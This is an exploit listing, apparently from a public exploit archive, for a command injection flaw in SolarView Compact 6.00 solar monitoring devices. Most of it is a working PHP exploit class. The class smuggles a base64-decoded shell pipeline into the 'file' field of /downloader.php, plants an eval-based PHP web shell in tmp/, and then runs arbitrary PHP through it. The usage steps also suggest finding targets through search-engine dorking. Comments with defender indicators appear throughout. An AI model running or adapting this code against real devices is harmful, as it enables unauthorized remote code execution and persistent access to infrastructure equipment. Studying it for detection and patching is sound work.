## https://sploitus.com/exploit?id=PACKETSTORM:182156
=============================================================================================================================================  
| # Title : SolarView Compact 6.00 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.contec.com/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking in Google or other search engine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 112 set your target .  
  
[+] save code as poc.php .  
  
[+] Usage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
  
/**
 * Proof-of-concept HTTP client for the SolarView Compact 6.00 injection described on this page.
 *
 * What the code does, as visible here:
 *  - executeCommand() sends a request to /downloader.php whose `file` field is
 *    ";<shell pipeline>;.zip", where the pipeline is "echo <base64>|base64 -d|bash".
 *  - uploadWebshell() uses that to write a PHP file under tmp/ on the device.
 *  - executePhp() then POSTs base64-encoded PHP to /tmp/<name>.php.
 *
 * Defender notes (derived from the request shapes above):
 *  - Log/IDS indicators: `file` values on /downloader.php containing ';' or '|', or the
 *    "base64 -d" pipeline; POSTs to /tmp/<16 hex chars>.php carrying a single field with
 *    an 8-hex-char name and a base64 value.
 *  - Host indicator: a new .php file in the tmp/ directory whose content is an
 *    eval(base64_decode($_POST[...])) stub.
 *  - NOTE(review): the page gives no fixed version or advisory id; confirm the vendor's
 *    patched firmware and keep the device's web interface off untrusted networks.
 */
class SolarViewExploit {
// Base URL of the device, stored without a trailing slash.
private $targetUri;
// File name of the dropped PHP file; set by uploadWebshell().
private $webshellName;
// Name of the POST field the dropped file reads; set by uploadWebshell().
private $postParam;
// Timeout handed to the HTTP stream context (seconds, per PHP's 'timeout' context option).
private $timeout;

/**
 * @param string $targetUri Base URL; any trailing '/' is stripped.
 * @param int    $timeout   Request timeout, default 40.
 */
public function __construct($targetUri, $timeout = 40) {
$this->targetUri = rtrim($targetUri, '/');
$this->timeout = $timeout;
}

/**
 * Writes a PHP stub into tmp/ on the device through executeCommand().
 *
 * @param string|null $webshell File name to use; when null a random 16-hex-char name
 *                              ending in ".php" is generated.
 * @return array|null The ['code', 'body'] array from sendRequest(), or null when
 *                    injectPhpPayloadPng() returns null (it never does in this listing).
 */
public function uploadWebshell($webshell = null) {
// Randomize file name if option WEBSHELL is not set
$this->webshellName = $webshell ?? $this->generateRandomFileName();

// Random 8-hex-char field name; the stub only reacts to this one POST field.
$this->postParam = $this->generateRandomString(8);

// Inject PHP payload into the PLTE chunk of a PNG image to hide the payload
// NOTE(review): injectPhpPayloadPng() below is a placeholder that returns its input
// unchanged, so what gets written is the bare PHP stub, not a PNG.
$phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";
$pngWebshell = $this->injectPhpPayloadPng($phpPayload);

if ($pngWebshell === null) {
return null;
}

// Encode webshell data and write to file on the target at the tmp directory for execution
// The path is relative ("tmp/..."); executePhp() later requests /tmp/<name> over HTTP, so
// the listing assumes both refer to the same directory - TODO confirm against the device.
$payload = base64_encode($pngWebshell);
$cmd = "echo {$payload}|base64 -d >tmp/{$this->webshellName}";
return $this->executeCommand($cmd);
}

/**
 * POSTs $cmd, base64-encoded, to the dropped file under the random field name.
 * The stub base64-decodes the field and passes it to eval(), i.e. it is treated as PHP source.
 *
 * @param string $cmd Text to send.
 * @return array ['code' => int, 'body' => string|false] from sendRequest().
 */
public function executePhp($cmd) {
$payload = base64_encode($cmd);
return $this->sendRequest('POST', "/tmp/{$this->webshellName}", [
$this->postParam => $payload
]);
}

/**
 * Sends $cmd to /downloader.php inside the `file` field.
 *
 * The field value has the shape ";echo <base64>|base64 -d|bash;.zip". Presumably the
 * endpoint places `file` on a shell command line without escaping (server code is not
 * shown here), which is what an allow-list on file names or escapeshellarg() would prevent.
 *
 * @param string $cmd Shell command text.
 * @return array ['code' => int, 'body' => string|false] from sendRequest().
 */
public function executeCommand($cmd) {
// Encode payload with base64 to ensure proper execution
$payload = base64_encode($cmd);
$cmd = "echo {$payload}|base64 -d|bash";
return $this->sendRequest('GET', '/downloader.php', [
'file' => ";{$cmd};.zip"
]);
}

/**
 * Probes the target by echoing a random 16-hex-char marker and reading /opt/svc/version.
 *
 * Returns "Vulnerable: <banner>" only when the response code is 200, the marker appears in
 * the body AND the body matches the "SolarView Compact ver.N.NN" pattern. Every other
 * outcome (network error, non-200, marker present but banner in another format) returns
 * the "Safe" string, so that string is not evidence that a device is patched.
 *
 * @return string Verdict text.
 */
public function check() {
// Checking if the target is vulnerable by echoing a randomised marker
echo "Checking if {$this->targetUri} can be exploited.\n";
$marker = $this->generateRandomString(16);
$res = $this->executeCommand("echo {$marker};cat /opt/svc/version");

if ($res && $res['code'] == 200 && strpos($res['body'], $marker) !== false) {
if (preg_match('/SolarView Compact ver\.\d\.\d\d/', $res['body'], $matches)) {
return "Vulnerable: " . $matches[0];
}
}
return 'Safe: No valid response received from the target.';
}

/**
 * Runs uploadWebshell() and, if its response code is exactly 200, calls executePhp().
 * The executePhp() result is discarded; nothing from the response is printed or returned.
 *
 * @param string $payload Text forwarded to executePhp().
 * @throws Exception When the upload request did not return code 200.
 */
public function exploit($payload) {
echo "Executing payload on {$this->targetUri}.\n";
$res = $this->uploadWebshell();

if (!$res || $res['code'] !== 200) {
throw new Exception('Web shell upload error.');
}

$this->executePhp($payload);
}

/**
 * Issues one HTTP request through PHP's http stream wrapper (file_get_contents with a
 * stream context; no cURL call appears in this listing).
 *
 * $params are always URL-encoded into the request body ('content'), for GET as well as
 * POST, and the URL itself carries no query string. Detection that inspects only the
 * query string would not see this listing's `file` value; request bodies need inspecting too.
 *
 * @param string $method HTTP method.
 * @param string $uri    Path appended to the base URL.
 * @param array  $params Form fields.
 * @return array ['code' => int status or 0 when no status line was captured,
 *                'body' => response body, or false when file_get_contents() fails]
 */
private function sendRequest($method, $uri, $params) {
$url = $this->targetUri . $uri;
$options = [
'http' => [
'method' => $method,
'header' => 'Content-Type: application/x-www-form-urlencoded',
'timeout' => $this->timeout,
'content' => http_build_query($params)
]
];

$context = stream_context_create($options);
// '@' hides the warning PHP raises on connection or HTTP errors; failure shows up as false.
$response = @file_get_contents($url, false, $context);
// $http_response_header is filled in by PHP in this function's scope after the call above;
// characters 9-11 of the first entry ("HTTP/1.x NNN ...") are the status code.
$code = isset($http_response_header[0]) ? intval(substr($http_response_header[0], 9, 3)) : 0;

return [
'code' => $code,
'body' => $response
];
}

/**
 * Placeholder: returns $phpPayload unchanged. No PNG is built and null is never returned,
 * so the null check in uploadWebshell() is unreachable with this implementation.
 *
 * @param string $phpPayload PHP stub text.
 * @return string The same text.
 */
private function injectPhpPayloadPng($phpPayload) {
// Here you would implement the logic to inject the PHP payload into a PNG file.
// This is a placeholder implementation.
return $phpPayload; // Modify this to return the actual PNG with embedded PHP payload.
}

/**
 * Random lowercase-hex name followed by ".php" (16 hex chars by default).
 * Assumes $length is even, since $length / 2 bytes are requested.
 */
private function generateRandomFileName($length = 16) {
return bin2hex(random_bytes($length / 2)) . '.php';
}

/**
 * Random lowercase-hex string of $length characters; assumes $length is even.
 */
private function generateRandomString($length) {
return bin2hex(random_bytes($length / 2));
}
}
  
// Example of usage
// Builds the client with the default 40-second timeout, prints the verdict string returned
// by check(), then calls exploit(). exploit() throws Exception when the upload response code
// is not 200, and nothing here catches it; its result is not printed either.
$targetUri = 'http://target-ip'; // Replace with the actual target URL
$exploit = new SolarViewExploit($targetUri);
echo $exploit->check();
$exploit->exploit('whoami'); // Replace with your payload
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================